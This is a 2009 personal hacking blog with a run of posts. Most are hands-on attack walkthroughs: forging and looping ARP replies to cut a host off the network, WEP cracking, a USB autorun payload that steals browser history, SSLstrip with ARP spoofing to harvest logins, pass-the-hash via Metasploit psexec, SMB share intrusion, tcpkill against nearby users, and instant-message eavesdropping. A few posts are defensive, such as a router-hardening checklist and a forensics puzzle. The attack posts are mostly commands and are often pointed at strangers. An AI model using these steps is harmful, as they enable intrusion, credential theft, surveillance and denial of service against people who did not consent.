Monday, November 30, 2009

Manually modifying a Network packet, the way the pro's do it

In my previous post, i spoke about using ettercap and and a plugin "Isolate", to take down a host on a network. It poisons the arp cache of the victim's machine into linking its own mac address to the router's/gateway's IP address, thus achieving a complete denial of service (google:DOS attact). In this post, im gonna be discussing how you can perform such an attack using a more manual method, manually constructing the malicious packet.

File2cable is a simple program that sends a file as a raw ethernet frame over a specified interface.

Hexedit is a simple hex editor for unix machines.

In this demo, we are going to isolate a host,just like we did with ettercap and it's Isolate plugging.

The first thing that you want to do is to use wireshark and capture a "ARP reply" packet. When you got that packet (to use as a prototype), export that frame/packet bytes to a file (for this example, ill name the file "arp_reply"). Open the file with hexedit (# hexedit -b arp_reply). Now, the idea behind modifying the packet is knowing what to change. You want to have wireshark and hexedit opened side by side so you are watching both screens. In wireshark pay attention to the hexdump frame at the bottom While doing that, in the frame above that select the layer 2 frame(Ethernet II) and notice that a certain amount of bytes are selected in the hexdump below. The selected bytes are a representation of the ethernet frame. Now within that ethernet frame, break it down to tree view and select destination. Notice the selection in the hexdump now. Anything familiar about the hex bytes selected? Its the destination mac address. Now you can select other items in the Ethernet frame II portion and notice the different hex representations for your selections. Now we can change these things using hexedit. We use wireshark as a reference so we know which hex bytes to change in hexedit. This is the main idea of manually altering a packet.

Now im going to tell you everything that you need to change using hexedit. Please note that we are in the hex realm of things, the changes you are going to make are gonna be the hex representations of certain values(Note that the mac address is already in HEX, so no conversion necessary)

[Ethernet II]
Destination: Set this to the mac address of the target host (victim who's arp table we are going to poison)
Source: Set this to your network interface's mac address (put the real thing otherwise it wont work)

Sender MAC address: You must set this to the target host's own mac address (we poison his cache here)
Sender IP address: We set this to the router/gateway's IP address in hex of course
Target MAC address: We set this to the targets mac
Target IP address: we set this to the targets IP address

Press ctrl+x then hit the enter key, to exit and save the packet you just modified. Now to test this attack, on your victims machine, pull up a command prompt and check your arp cache (arp -a). Make a note of your routers ip to mac address mapping. Next send our packet/file onto the wire/network with file2cable, which can also be used in wireless networks as well (# file2cable -i eth0 -f arp_replay). Now go check the arp cache on the victims machine. See the difference? If you try browsing to websites and things dont work, then it worked and this machine has been taken down.

Since a computer's arp cache normally refreshes around every 5 minutes, our attack wont be very long term. What we can do is right a script that would send our malicious packet ever few seconds. We use secounds instead of minutes because the router can send a arp request to the victim and when the victim reponds accordingly, the victim naturally will learn the mac to ip mappings of the arp requester. We can write a script as follows:


file2cable -i eth0 -f arp_reply
sleep 10

The above script will loop the file2cable commands every 10 seconds.

Here is a quick visual from an arp cache poisoning attack using hexedit and wireshark to capture and modify an arp packet:
It should give you an idea visually what you have to do/change when using wireshark and hexedit in conjunction. However, please note that they are performing a different attack from what i demonstrated here. If you think you have my example convered, try their example next and get a good feel for things.

Resources/Good reading:

Take down any host on a network using Ettercap's plugin Isolate

Ettercap is a very popular password sniffer and packet analyzer. It comes pre-built with many plugins, including isolate in which im gonna briefly discuss here. This plugging allows you to literally take down a host on a network. For example, if you find out that you have a user using the internet for malicious purposes, why not just take him out? The theory behind this attack lies around poisoning the users arp cache. Since a computer on your LAN that communicates on the interenet relies on knowing what the mac address of the gateway or router is, it wont be hard to imagine what would happen if we tell your machine that in order to get to internet, send all packets to another mac address. More interestingly, say the router's ip address is, if we poison the arp cache of a machine to link the routers address or to that computer's own mac address what would result is a complete denial of service. Whenever that users machine tries communicate on the web, all his packets would be send to his own mac address. Talk about a state of confusion

This attack may take up to 5 mins to work. It relies on the arp cache entry to time out before it needs to refresh it self.

# ettercap -Tq -i eth0 -P isolate / //

The above command would complete take the host down. You can run ipconfig /all on you windows machine and arp -a, then compare the mac address. If they are the same, then you just pwned that machine. Now you can tell those pesky torrent whores just before you take them down, "Say hello to my lil friend.....".....Isolate.

Resources/Good reading:

Cracking WEP with aircrack-ng ( cheat sheet)

We all should by now be aware of the famous insecurities of the wireless encryption WEP. Because of its implimentation of weak IVs (initialization vectors) in the packets, it becomes quite easy to guess certain packets (arp broadcast for example). The idea behind the attack is to capture enough packets so a program like aircrack can perform some analysis on the capture IVs and hence derive what the WEP key should be. We would be using the aircrack-ng suite of tools to crack us some WEP. Please perform this attack on your own network. This should be used only to audit the security of your own network or neworks to whom you have the right permissions to audit.

[Cheat sheet] using Bactrack4:

# ifconfig wlan0 down //bring down the wireless interface
# macchanger -r wlan0 //change your mac address to a random fake one
# ifconfig wlan0 up //bring back up the wireless intereface
# airmon-ng start wlan0 //create an interface that listens on monitor mode
# airodump-ng mon0 //analyze the air for potential WEP targets
# airodump-ng --bssid "mac_address_of_targetAP" --channel "channel_of_tacgetAP" -w wep.pcap mon0 //start capturing packets of your intended victim
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --fakeauth 0 mon0 //perform a fake authentication to access point
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --deauth 10 -c "Connected_client_mac_address" mon0 //Send deauth packets to disconnect a client from the target access point
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" -3 mon0 //perform arp replay attack to speed up the data retrieval process
#aircrack-ng -b "mac_address_of_targetAP" -P 2 wep.pcap-01.pcap //when there is enough packets (10000 or more) use aircrack this way to attemp to crack the WEP key

Thats it ...
Please use google to find out more information about the insecurities of WEP.

Saturday, November 28, 2009


Ngrep is a basic packet sniffer with its main feature being the ability to filter through network packets, searching(grep) for certain strings in the packets being sent over a network and display the matching string's packet content in a readable format. Think of it like unix's grep but done over network streams. Ngrep uses standard tcpdump filters, host, port 80, etc.


# ngrep -d eth0 port 80 // displays all port 80 traffic on interface eth0

# ngrep -d eth0 "" port 80 // parses through port 80 traffic data for string

# ngrep -d eth0 "*" port 80 // parses through port 80 traffic for *, where the * can be anything.

For better visual output add "-W byline" option

# ngrep -d eth0 -W byline "" port 80

To search for more than one string

# ngrep -d eth0 -W byline -i "pass|USER" -n 2 port 80 // searches for string 'pass' or 'USER'. "-i" ignores the case of pass or USER. "-n 2" will match only 2(any number can be specified) packets total, then exit.

# ngrep -n 2 -q -d eth0 -W byline -wi "pass|USER" port 80 // searches for string 'pass' or 'USER'. "-i" ignores the case of pass or USER. The "-w" tells ngrep to match the string as a word. "-q", quiet mode; don't output any information other than packet headers and their payloads (if relevant).

The following can parse for logins to gain passwords:

# ngrep -d eth0 -W byline -i "pass|USER" port 80 |grep pass

More examples mimiced from:

Usage examples:
ngrep '' udp (print all UDP packets)
ngrep '' icmp (print all ICMP packets)
ngrep '' port 53 (print TCP or UDP port 53 packets)
ngrep '' tcp port 23 (print TCP port 23 packets)
ngrep 'LILWORD' port 138 (print Microsoft browsing traffic for NT domain LILWORLD)
ngrep -iq 'rcpt to|mail from' tcp port 25 (monitor current delivery and print sender and recipients)
ngrep 'user' port 110 (monitor POP3)
ngrep -q 'abcd' icmp (Microsoft operating systems fill the ICMP payload with the alphabet; is the "pinging" host running a Microsoft operating system?)
ngrep -iq 'user-agent' tcp port 80 (determine client application that client host is running)
ngrep '220' port 21 (determine version of FTP server)
ngrep 'SSH' port 22 (investigate Secure Shell)
ngrep -v '' port 23 (see all traffic but telnet)

Resources/Good reading:

Friday, November 27, 2009

HTTPtunnel, Another way to tunnel your traffic to bypass firewalls

Like the title says, Httptunnel allows you to create a tunnel (non-encrypted i might add) so you can redirect ports or by pass firewalls. Its not the most preferred method to tunnel traffic as there is no encryption mechanism to keep your actions hidden like ssh tunneling or stunnel would offer. Never the less, its a easy utitility to get up and running quickly and works on both linux and windows system.


On the server [linux]:
For this, you are required to have some sort of service running locally. We are gonna use a webserver on port 80. Start the webserver and have a demo index.html page in the necessary folder so clients would be greeted with a page. Then run the httptunnel server as follows:
# ./hts -F 4444 //Listens on port 4444, and forwards all traffic to itself ( on port 80

On the client [windows]:

c:\>htc.exe -F 5555 //Listens on port 5555 and connects to the awaiting httptunnel server at on port 4444

Now on the client, open up a web browser and type in the url, If everything works fine, you should be greeted with the webpage at

Resources/Good reading:


Foremost is a very popular tool in the open source forensic world. This can recover files from practically anything, from hard disks, disk images, pcap network capture and your RAM. Unfortunatly, Due to programming difficulties, foremost is limited to processing files smaller than 2GB in earlier versions. In version 0.69, maximum file carv size was 4GB. Foremost served as the basis for other file carving applications such as scalpel and tcpxtract. The program uses a configuration file (foremost.conf) to specify headers and footers to search for and carv out.

Foremost.conf comes with preconfigured headers and footers for well known file types. The configuration file is not limited to whats there by default, but can be extended with by adding your own headers and footers or make a custom config file.

# foremost -i file.img -t doc -o /root/Foremost_Dir -c /etc/foremost.conf

'-i': Input file(image). Can specify a drive or partition as well, /dev/sda1
'-o': Folder to dump the recovered files in
'-t': Type of file to search for. Default is to search for all known file types in its config file.
'-c': [optional] Sets the config file to use. If left out, foremost is gonna use its defaul config file located at /etc/foremost.conf

[Supported file types out the box]['-t']

As mentioned earlier, Scalpel is based on foremost. Scalpel is more efficient and faster than foremost. Foremost's authors have recommended that practitioners use Scalpel instead of Foremost as well.

Resources/Good reading:

10 Steps to securing a wirless router, by synjunkie

I got this from another blog and i find the information very help and comprehensive. It does teach you or show you how to configure your routers but tells you the things that you should know and check for when setting up your own wireless router. Therefore, you can use this as your checklist, if you will to not getting pwned but your inquisitive neighbours.

The following was taken from synjunkies blog:

1. Upgrade Firmware

It's always a good idea to keep firmware as up to date as possible as the vendor may have fixed known vulnerabilities or bugs since the hardware shipped. As a bonus you might even get a bit more functionality thrown in as well with the firmware upgrade. Its also a god idea to check the vendors site every couple of months for updates.

2. Change the default Password


3. Turn off Wireless Administration

This will prevent anyone who is not physically plugged into the network from administering the wireless router.

4. Enable Encryption

Enable the best encryption possible. WPA2 is preferred but if the connecting devices only support WEP then WEP it is. Just be aware that WEP is crap and it can b e cracked in seconds. Ensure that whatever encryption you use it has a long random key. There are plenty of random key generators available so use them.

5. Change & Hide the Default SSID

Don't leave your default SSID as Linksys or Belkin. Change it to something unique but not something that identifies it as your network, such as “Bob Scratchets House”. Even after hiding the SSID it is possible for an attacker to view it but it is another layer in your defense strategy.

6. Apply MAC Address Filtering

Each device that has a wireless card in will have a MAC address. Apply MAC address filtering so only devices with the specified MAC addresses can connect using wireless to you router. This can be bypassed but it's another hurdle to make a potential attacker jump through.

7. Disable UPnP

Universal Plug and Play is a method by which software can open up ports on the router to allow external hosts to communicate through the router with a host on the LAN. This can also be used by malware to open up the router to allow a route in. by disabling UPnP you will need to enable port forwarding when required.

8. Configure the DHCP Settings

If your router allows you to change your DHCP scope you may want to set it to hand out addresses from a range other than the default, such as the 172.16.x.x range. Also by limiting the amount of addresses to the number of hosts you have it might provide an early warning system if someone does manage to bypass your security and hop onto your wireless LAN.

9. Configure DNS Settings

Point your DNS to a provider such as OpenDNS and utilise there free services. OpenDNS can be used to block specific types of sites such as File Sharing or Pornography and also to log where computers from your LAN are going to. It will also block your computer from visiting known bad sites. Another important note, when the DNS flaw was released to the public by Dan Kaminsky at Blackhat 08, Open DNS was one of the first DNS providers to provide protection. At the time of this post many ISPs are still vulnerable.

10. Enable Logging

If your router allows you to enable logging it is worthwhile doing so. By familiarising yourself with the logs regularly you will get to recognise what is normal and what is not. But remember, logs are only useful if you check them!

The functions I have raised in these 10 steps are those that should be available on most consumer grade routers. If you have a router that does have more functionality such as allowing you to use HTTPS to access the administrative interface then that's great, use it.

Get familiar with what your router can do and know where to look to check settings such as port forwarding. And once you have set up the router and gotten it working well, save the config and store it somewhere safe and secure such as in a Truecrypt volume or in an encrypted disk image.


Very interesting and informative checklist. The closing sentences does add some complexity with storing config files on truecrypt volumes or encrypted disk images. Although its a good practice (and most likely madatory)for high security environments, the acerage user doesnt and most likely wouldnt be too concerned about backup up his config files in secure locations. They probly know what encryption is but dont know how to use it to their own benifit and probly wouldn't worry about the hasstle to learn. But those that might be interested in learning about encrypting their data, im gonna do a post of Truecrypt in the near futer, showing you how you can encrypt your data/router configs in an ecrypted volume.

Resources/Good reading:

Rinetd, redirector

This program seems to be loosing some of its buzz but still noteworthy in my opinion. Its not complex program to use or learn. Its main role/function is to redirect TCP connections from one IP address and port to another. It is able to handle any number of connections to address/port pairs specified in its config file, located at /etc/rinetd.conf. Rinetd does not redirect ftp because FTP requires more than one socket.

Typical Forwarding rule in rinetd.conf:
bindaddress bindport connectaddress connectport

For example: 80 80

Would redirect all connections to port 80 of the Public IP address to port 80 of the address, which would typically be an mahine on the inside of a firewall which has no direct routing to the outside world. This method only responds on the indivual interface connected to the outside(ethernet card connected to the modem). If this server has multiple interfaces, sometimes its preferable to respond on all of them. 80 80

Would redirect all connections to port 80 for all ip addresses assigned to the server

You can also allow and deny specific clients or clients in a subnet from using the redirector. The '?' wildcard can be used to match any one character while '*' wildcard can match any number of characters, including zero.

allow // allow one specifc addres
allow // allow range of address matchin
allow 201.21.21.* // allow IP addresses for class C domain, -255

After you have customized your config file, to run the server run:

# rinetd

If you have a few custom config files you can specify which one to use.

# rinetd -c /etc/my_custom_config.conf

It might be useful to have logs and by default rined doesn't produce any. To activate logging, add the following line to the configuration file:

logfile logfile_location


logfile /var/log/rinetd.log

By default, rinetd logs in a simple tab-delimited format containing the following information:
Date and time
Client address
Listening host
Listening port
Forwarded-to host
Forwarded-to port
Bytes received from client
Bytes sent to client
Result message

Thursday, November 26, 2009

USB Hack

There are many usb hacks currently on the web, each with unique abilities and purposes. The idea behind the hack is to make use of the autorun feature that most systems employ. This means that when you plug in your USB stick (those capable of thbe autorun feature, see U3 supported drives), it can autorun a program or script. This means that you can be at a coffee shop and you can turn around to by some coffee and leave your comp unattended for a1 min and in that space of time, a malicious user can plug his thumbdrive in you system for 5 seconds and aquire valuable information, such as passwords and browser history. Thats it, 5 seconds and you get pwned.

This project is mostly used on the customizable U3 drives but can be made to work with regular thumb drives with a difference. Its not fully automatic. When u pluggin the drive, you should be prompted with a screen in which with a click of the 'Open' button, you can make your script or executable run. For our demo, we would be using a regular thumb drive to simulate the attack. We are gonna use windows for this.

Files you would need:
[nircmd.exe] :
[iepv.exe] :
[drive.ico]: Just an icon that i used. Use any icon and rename to drive.ico

Open up notepad and type the following. Save the file as Autorun.inf:

OPEN="nircmd.exe execmd iepv.exe /stext ievh.txt"
ACTION=Start my application

Copy iepv.exe, nircmd.exe, drive.ico and Autorun.inf to a newly formatted thumb drive. Voila, you are finished. The Autorun.inf would cause a prompt to appear when you plug your thumb drive in a windows system. Nircmd.exe is a useful multi-purpose commandline utility that we used to stealthily execute iepv.exe (to hide the command prompt that may popup anytime u execute a command line based tool). Iepv.exe is a small utility that does one thing well, dump Internet Explorer's history contents.

To execute the attack (if u havent figured the rest out already), all you do is plug the usb drive into a windows system. A autorun popup appears asking you to open the drive. All you do from here onwards is click open then the iepv.exe would execute its job in the background. Within 5 seconds you should be able to unplug the drive and take it away with you. When you open your drive their would be a text file, iehv.txt stored to the thumb drive with a listing of the browsing history of your target. This method can be extended by the use of scripts and other executeables. i'd leave some examples of this stuff in the resources section.

Resourses/Good reading:

Attack on SSL with SSLstrip

There is alot of controvery around this tool, mainly its major ability to put a large some of noobs at your ankles. Yes, this tool is some serious business. I was reading the author's (Moxie Marlinspike) webpage of sslstrip and read that the research that he published got his account with paypal suspended. He presented his work in one of the worlds famous hacker conferences, Black hat 2009, and posted some statistics of the over 500 users he was able to steal credentials from, including passwords, credit card numbers, etc. The most important highlight of these stats was that 0 of these users knew of their pwnge. It was completly transparent to them.

This tool doesnt perform a generic man in the middle for of attack on ssl like tools such as ettercap or cain and able does. These tools rely on the stupidiy of users to accept a fake certificate on their web browser which most of them still do. With SSLstrip, the wow factor of the whole concept is that 98% of the attack is transparent to the average user. According to the author, "sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects them, then map those links into either look-alike HTTP links or homograph-similar HTTPS links". In version 0.5, a neat feature was added where it It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

There is a decent explanation on how it works on the authors website that im gonna mostly mimic, with minor changes for better elaboration.


  • Python >= 2.4 (apt-get install python)
  • The python "twisted-web" module (apt-get install twisted-web)
Or if you have backtrack 4 like i do, then you don't need to worry about the above.


  • # tar zxvf sslstrip-0.5.tar.gz //extrack the contents from compressed archive
  • # cd sslstrip-0.5
  • (Optional)# sudo python ./ install //It Installs to appropriate directories. Not a necessity, can already run out the box.

Running sslstrip

  • Flip your machine into forwarding mode. (# echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Setup iptables to redirect HTTP traffic to sslstrip. (# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )
  • Run ettercap to perform an arpspoof attack and also sniff out passwords on the fly and display them in real time. (# ettercap -Tq -i eth0 -M ARP:remote / /10.00.1/)
  • Run sslstrip. (# -l )

That all to the magic. To test this, goto a website like facebook and logon with some credentials(correct or incorrect) and just after you do so, take a look at ettercap's interface. Did you notice anything confidential about yourself that facebook and no one else should be allowed to know. AHHH.

Here's a nice video by John Strand demonstrating this attack:

SSLStrip from John Strand on Vimeo.

Resources/Good reading:

Cracking passwords with John the Ripper

John the ripper is a free, fast and portable password cracker. It currently runs on over 10 platforms including linux/Unix, Dos and Windows. It can be run against various encrypted password formats: Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash.

Attack types: Dictionary and Brute force

Taken from wikipdea:

One of the modes John can use is the dictionary attack. It takes text string samples (usually from a file, called a wordlist, containing words found in a dictionary), encrypting it in the same format as the password being examined (including both the encryption algorithm and key), and comparing the output to the encrypted string. It can also perform a variety of alterations to the dictionary words and try these. Many of these alterations are also used in John's single attack mode, which modifies an associated plaintext (such as a username with an encrypted password) and checks the variations against the encrypted hashes.

John also offers a brute force mode. In this type of attack, the program goes through all the possible plaintexts, hashing each one and comparing it to the input hash. John uses character frequency tables to try plaintexts containing more frequently-used characters first. This method is useful for cracking passwords which do not appear in dictionary wordlists, but it does take a long time to run.

This demo assumes you have acquired the hashes from a windows system (hashes.txt in this example) and a wordlist (readily available on the web, use google):

# ./john --wordlist=mywordlist.txt hashes.txt
Loaded 2 password hashes with no different salts (LM DES [128/128 BS SSE2])
MYPASS (admin)
guesses:2 time: 0:00:00:00 100% c/s 1298k trying: ANOS - ANYONE

As you can see the guest account has a blank password, while the admin account has a password of 'mypass'. John computer these hashes in less than a second with my chosen wordlist. Remember, you may only crack the password only if its in the wordlist. Take your time in choosing a good wordlist and make necessary changes to them based on your initial profiling of a potential target.

When using hashes like MD5 or SHA1 for John to read those hash files correctly they need to follow the format of "user:hash". You cannot just have the hash by itself in a text file.

# echo -n "mypass" | openssl dgst -md5 > hash.txt

the above outputs the hash but john does not just read the hash by itself. You can edit the hash.txt text file and add a username followed by a colon (:) , then followed by the hash. John will then be able to input the hash file and attempt to crack it.

You can also create wordlists and expand a wordlist with johns word mangling rules

# ./john --wordlist=mylist.txt --rules --stdout

Resources/Good reading:

Playing with netbios shares (smbclient and nmblookup)

So you are on a network and wanna learn info about your neighbours, whats their computer name is, who is logged on share names etc. Windows make most of this information easy for us to obtain. Enter the smbclient, an ftp-like client to access smb/cifs resources and nmblookup is a utilty that is used to lookup Netbios names. Before we begin our enumeration of the network we need to determine the IP's of the live windows clients.

# netdiscover -i eth0 -r //Discover live clients that respond to our arp requests

I personally would use nmap for this as it has many other scan techniques than just the arp method. After we identify oue potential target (we are gonna use lets use them in smbclient and nmblookup.

#nmblookup -A //resolve netbios name. The hex code in the second column means something to us. If you get <03> the corresponding text to the left of '<03>' would be the currently logged in user. Below is a list taken from ,, that list some of the meanings behind the hex code.

Name                Number(h)  Type  Usage
00 U Workstation Service
01 U Messenger Service
01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Microsoft Exchange Interchange(MSMail

23 U Microsoft Exchange Store
24 U Microsoft Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Clients Remote Control
44 U SMS Administrators Remote Control

45 U SMS Clients Remote Chat
46 U SMS Clients Remote Transfer
4C U DEC Pathworks TCPIP service on
Windows NT

42 U mccaffee anti-virus
52 U DEC Pathworks TCPIP service on
Windows NT

87 U Microsoft Exchange MTA
6A U Microsoft Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Application
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
00 U IIS
2B U Lotus Notes Server Service
2F G Lotus Notes
33 G Lotus Notes
20 U DCA IrmaLan Gateway Server Service
Next we can use smbclient to reveal the shares on a particular system.

# smbclient -N -L //List share names and OS type

-N: Surpases the password prompt, assuming we dont of any passwords
-L: list shares and any other available service it can see.

We can attempt to connect/login to a system share.

# smbclient // -N // try and connect to 'share' on

If you are lucky and manage to get into the share, its as of a result of poorly implemented shares. Yon can browse the directory, upload/download files and some other goodness. Type help for a list of commands at your disposal.

# smb> help

Its more difficult to set up a proper share on XP with the appropriate permissions than to set up
a share thats open to everyone. Sounds like the mindset of the typical windows user aint it. I'll admit, i was one of em.

Resources/Good reading:

Pass-the-Hash, Who needs a password anyways...

Pass the hash refers to a method in which a user can authenticate with a system without using the plain-text password. What is used instead is what is known as the encrypted hash (your plain-text password is ran through a one way process or algorithm and the result is known as a password hash). In the passing the hash method, we would be using this hash to authenticate with the server. We can't just type in the hash into the password prompt and get it work if thats what you're assuming. We are gonna require some special tools to do the job for us as this method is not naturally supported by windows for obvious reasons. The tools im gonna demo is a modified version of smbclient, called written in python and found in Bactrack 4 and a metasploit module, psexec. This demo requires you to use your skills to obtain a these hashes(reasearch fgdump or pwdump).

Enter the following commands for smbclient:
# python ./ //Start the client
# open 139 //opens a SMB connection against host/port
# login_hash user1 your_lmhash your_nthash //logs into the smb session with user/hash combo. Note the space between both lm and the nt hash.
example: login_hash mary AAFF5441321GSGW566WT ERGBXHG4J65461DF564DHD
# Shares //list available shares
# use share_name //connects to a specific share

If all goes well and you are logged in, you can go up the file tree, download or upload files, delete files etc. For more commands just type 'help'.

Enter the following commands for smbclient:
# ./msfconsole //Lauch the metasploit framework
msf> use exploit/windows/smb/psexec //select the psexec module to use as the exploit
msf exploit(psexec)>show options //list the options that are needed for the exploit to work
msf exploit(psexec)>set RHOST //sets the targets IP
msf exploit(psexec)>set SMBUser admin //sets the username
msf exploit(psexec)>set SMBPass lm_hash:nt_hash //Sets the lm:nt hashes. Note that you need both seperated only by a ':'. Leave the rport at 445(139 wont work).
msf exploit(psexec)>set PAYLOAD windows/exec //sets your payload. Do show payloads for others
msf exploit(psexec)>set CMD calc.exe //sets the command to execute
msf exploit(psexec)>exploit //run the exploit

If all is well, calc.exe should have been executed on the remote system. Obviously you may want too do something more than just run calc like gain a shell. No problem, just set the required payload and the necessary options and you're good to go.

Wednesday, November 25, 2009


A very useful and fast utility that can actively or passively perform some ARP reconnaissance in order to find which host are alive on the network. It performs its task by sending our arp request to a subnet you define (for example, and determine a host is alive if it recieves a responce. Its very basic but gets the job done.

# netdiscover -i eth0 -r -c 4

-i: Interface to that would be used
-r: Subnet range
-c: Number of times to send each arp request
-f: Fast mode. This only scans for nodes ending with .1, .100 or .254. in the network

Like i said, its simple and fast. There are many other similar tools out there that are more feature rich than this tool (like nmap) . If its one thing i like about any given tool is its simplicity and ease of use and this tool gets a perfect 10/10 for that.

Tcpkill and tcpnice

Tcpkill is a program that can be used to kill live tcp connections to or from a host, network, port or a combination of them all. Similarly, Tcpnice doesnt necessarily kill the connections, but attempt to slow them down. Say you're at an internet cafe and some dude sitting next to you is hogging up all the bandwidth with his multiple torrent downloads of illegal software. You're at your machine and you are trying to upload some important documents to your website. The frustration grows as your uploads begin to time out. What can he do to mitigate this issue? Well thanks the Dug Song, we have two methods to irritate our neighbour.

First we need to perform a MITM man in the middle attack(arpspoof or ettercap shall do) and enable forwarding in your kernel as follows:

# echo 1 > /proc/sys/net/ipv4/ip _forward

We then need to determine what local ip is hogging up the bandwidth. There is a useful sniffer that i use call tcptrack that list the live connections that it sees and the bandwidth/speed of the data that is being transfered back and forth on each connection.

#tcptrack -i eth0

Once you determine the IP of the bandwidth hogger (in this example,, its time to unleash our magic.

# tcpkill -i eth0 -9 host

The '-9' Specifies the degree of brute force to use in killing a connec-tion. Fast connections may require a higher number in order to land a RST in the moving receive window(Thats the method used to kill connections, flood the recieve windows with RST packets to tear down connections). Default is 3.

this in turn would kill/block all of the traffic going to or from If you wanted to be more specific and only block only the port that is using the most bandwidth, you can do this instead.

# tcpkill -i eth0 -9 host and port 4455

Or if you're really mad at the world, you can wipe off the whole subnet.

# tcpkill -9 net 192.168.1

Similarly, tcpnice can be used to slow connections down, rather than to simply kill them.

# tcpnice -i eth0 -A host

-A Inject TCP tiny window advertisements.
-I Inject ICMP source quench replies.
-M Inject ICMP fragmentation-needed replies with tiny next-hop MTUs.
-i interface to listen on
If no option (A,I,M) is given, all woud be used.

References/Good reading:

Forensic contest: Puzzle #2

If you recall in one of my previous posts I've found an interesting website,, where you can take part in a forensic puzzle contest with the possibility of winning interesting prizes. Unfortunalty, like the first one, i've always found out about the puzzle after the deadline has passed. However, I still manage to attempt to solve the puzzles in aid of polishing up my skills and to learn as well. Well this is part #2 to solving the second puzzle(On my own i might add lol). With Puzzle one, i had to look at some solutions to figure out where i went wrong then had to banged myself in the head for not being able to figure it out myself.

You can start off by importing the pcap file with wireshark and then put a display filter for the smtp protocol. Observation showed that Ann sent two Emails. The first is not relevant to the puzzle, but the second one is. You have to right click on any packet (thats part of the second email, not the first. Pay close attention so you dont accidentaly start a display filter on the wrong stream) and click on 'follow tcp stream'. By observation, you can determine that Ann's email is and her secret lover's email is Further analysis shows the text that was sent in the email and the contents that she told him to bring ("fake passport and a bathing suit"). We also see the name of the document being transfered is "secretrendeviuz.docx"

Just to recap some of the answers we already found:
  • fake passport and a bathing suit
  • secretrendevouz.docx
Next we are going to extract file being transfered as an attachment.
First we seperate the tcp streams:
# tcpflow -r evidence02.pcap

Then we already identified the necessary src and dst IP's in wireshark for the communication of the document over the network. Its the largest file that tcpflow outputs (# ls -lh, to see file sizes in folder). To make things easier, since tcpflow output a bunch of files wiht confusing names, lets rename the necessary file to "file1". (mv 192.168.....etc. file1). Dont actually put '..etc', the actual filename was just too long for me to bother to type it out. Next we analyze that file with 'xxd' utility. We want to look for or estimate the starting bytes of the file. We see that the secretredevouz.docx is being transfered using base64 encoding. This means that we wont be able to find the usual magic starting hex bytes of .docx files, which is '504B0304'. What i did was encode another docx file in base64 and see what its starting bytes was.
# base64 test.docx > test.docx.base64

I then used 'xxd' to see what the magic bytes were for the base64 encrypted file.
# xxd -l 4 test.docx.base ans: "55457344"

Bingo. The next few commands i used to extract the docx file from the tcp stream.

# xxd -ps file1 > file2

i then opened the file in a text editor, did a search for the magic bytes '55457344', then when it was found. i deleted all the bytes before that. I saved the file then converted the file back into its raw binary format with the following command.

# xxd -ps -r file2 > secretrendevouz.docx.base64

We now have the file in base64 encoding. All we have to do now is decode it.

# base64 -d secretrendevouz.docx.base64 > secretrendevouz.docx

I then got the MD5 hash
#md5sum secretrendevouz.docx

Then i opened the document in Microsoft word on a windows machine and extracted the rest of the information required for the puzzle.

Rendez-vous point: Playa del Carmen, Mexico

MDDSum of PIC: aadeace50997b1ba24b09ac2ef1940b7

Unfortunatly i couldn't find the password, its mostly lazyness on my part to do the relevant research for a tool that extracts smtp passwords. I figured ettercap or dsniff would have those abilities but had no success with them. Ill update the blog whenever i do figure out how to do so.


Finally figured out how to get the password. It turns out that the password is encoded in base64 format. All thats needed is the encoded base64 pass string and feed it into the base64 program for decoding. This is the commands that i used to get the password:

# echo "NTU4cjAwbHo=" | base64 -di -

I got the "NTU4cjAwbHo=" from anaylzing the smtp communication stream in wireshark


Msgsnarf is a tool from the Dsniff suite of tools that a sniffer that aims to parse only chat messages (conversations) from popular IMs (Instant messengers). Currently, msgsnarf can record selected messages from:
  • AOL Instant Messenger
  • ICQ 2000
  • IRC
  • MSN messenger
  • Yahoo messenger
You are gonna need to be the man in the middle so you can see all the traffic that is going in between targeted nodes (arpspoof or ettercap can be used for this).

# msgsnarf -i eth0
or you can filter specific hosts by a tcpdump filter expressionm
# msgsnarf -i eth0 host

'-i': interface to listen or sniff on (for live connections)

If you add a 'p' tag and remove the '-i', you can read from a pcap capture file and parse that for conversation. This method is more for forensics purposes.

This is a video of me performing this attack.

Eavse dropping on an MSN convo using msgsnarf from aerokid240 on Vimeo.

Resources/good reading:

Tcpdump filters

for those that don't know, tcpdump is a commandline packet analyzer (Sniffer) that can perform live packet analysis. With tcpdump you can filter the traffic so not all traffic is parsed or logged. Many programs and sniffers tend to follow tcpdumps filter syntax for its popularity and ease of use. Below or some examples of tcpdump filters taken from "":

Filtering hosts :

- Match any traffic involving as destination or source
# tcpdump -i eth1 host

- As source only
# tcpdump -i eth1 src host

- As destination only
# tcpdump -i eth1 dst host

# tcpdump src net mask
# tcpdump src net

Filtering ports :
- Match any traffic involving port 25 as source or destination
# tcpdump -i eth1 port 25

# tcpdump -n portrange 22-23

- Source
# tcpdump -i eth1 src port 25

- Destination
# tcpdump -i eth1 dst port 25

Network filtering :

# tcpdump -i eth1 net 192.168
# tcpdump -i eth1 src net 192.168
# tcpdump -i eth1 dst net 192.168

Protocol filtering :

# tcpdump -i eth1 arp
# tcpdump -i eth1 ip

# tcpdump -i eth1 tcp
# tcpdump -i eth1 udp
# tcpdump -i eth1 icmp

Let's combine expressions :

Negation : ! or "not" (without the quotes)
Concatanate : && or "and"
Alternate : || or "or"

- This rule will match any TCP traffic on port 80 (web) with or as destination host
# tcpdump -i eth1 '((tcp) and (port 80) and ((dst host or (dst host'

- Will match any ICMP traffic involving the destination with physical/MAC address 00:01:02:03:04:05
# tcpdump -i eth1 '((icmp) and ((ether dst host 00:01:02:03:04:05)))'

- Will match any traffic for the destination network 192.168 except destination host
